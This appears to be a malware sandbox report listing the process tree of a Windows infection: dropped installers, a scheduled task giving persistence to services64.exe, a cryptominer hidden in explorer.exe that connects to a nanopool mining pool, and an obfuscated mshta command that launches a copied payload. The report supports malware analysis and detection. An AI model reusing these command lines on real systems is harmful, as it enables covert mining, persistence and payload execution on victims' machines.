C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1916 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1756 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,708348063472063633,14253131340633892497,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x80,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8645546f8,0x7ff864554708,0x7ff86455471810⤵
-
C:\Users\Admin\AppData\Local\Temp\ad-d4d04-cf2-5098f-d4da6d325a532\Xewuxitumo.exe"C:\Users\Admin\AppData\Local\Temp\ad-d4d04-cf2-5098f-d4da6d325a532\Xewuxitumo.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aih03m0r.kre\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\aih03m0r.kre\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\aih03m0r.kre\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 23611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2s5em25m.1ks\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\2s5em25m.1ks\installer.exeC:\Users\Admin\AppData\Local\Temp\2s5em25m.1ks\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\2s5em25m.1ks\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\2s5em25m.1ks\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633155026 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ybhjj4mq.5i0\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ybhjj4mq.5i0\any.exeC:\Users\Admin\AppData\Local\Temp\ybhjj4mq.5i0\any.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nkv0q2pj.lba\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\nkv0q2pj.lba\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\nkv0q2pj.lba\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 24011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pzou0aai.23c\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri103a7805577.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri103a7805577.exeFri103a7805577.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Executes dropped EXE
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5570170.scr"C:\Users\Admin\AppData\Roaming\5570170.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8754910.scr"C:\Users\Admin\AppData\Roaming\8754910.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\7926442.scr"C:\Users\Admin\AppData\Roaming\7926442.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2412914.scr"C:\Users\Admin\AppData\Roaming\2412914.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1750641.scr"C:\Users\Admin\AppData\Roaming\1750641.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\inst001.exe"C:\Users\Admin\AppData\Local\Temp\inst001.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 2368⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 3448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 5368⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 5408⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 5368⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 5168⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"installer.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-NDEFM.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-NDEFM.tmp\installer.tmp" /SL5="$30272,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 7048⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\vc.exe/install /quiet8⤵
-
C:\Windows\Temp\{FF78DE28-511E-40EE-AB09-F62CE8C115BD}\.cr\vc.exe"C:\Windows\Temp\{FF78DE28-511E-40EE-AB09-F62CE8C115BD}\.cr\vc.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc.exe" -burn.filehandle.attached=552 -burn.filehandle.self=560 /quiet9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Temp\{94C1C6DC-85EA-4D94-8370-5FDB4F4746BA}\.be\VC_redist.x86.exe"C:\Windows\Temp\{94C1C6DC-85EA-4D94-8370-5FDB4F4746BA}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{505E588A-12D9-4939-8949-BB171214C9D2} {C11F67AF-C7AB-4D7E-83B6-1E56374660D6} 376810⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 108010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 7288⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 5048⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 9288⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 5448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 7608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 7248⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 5448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 7608⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 6088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
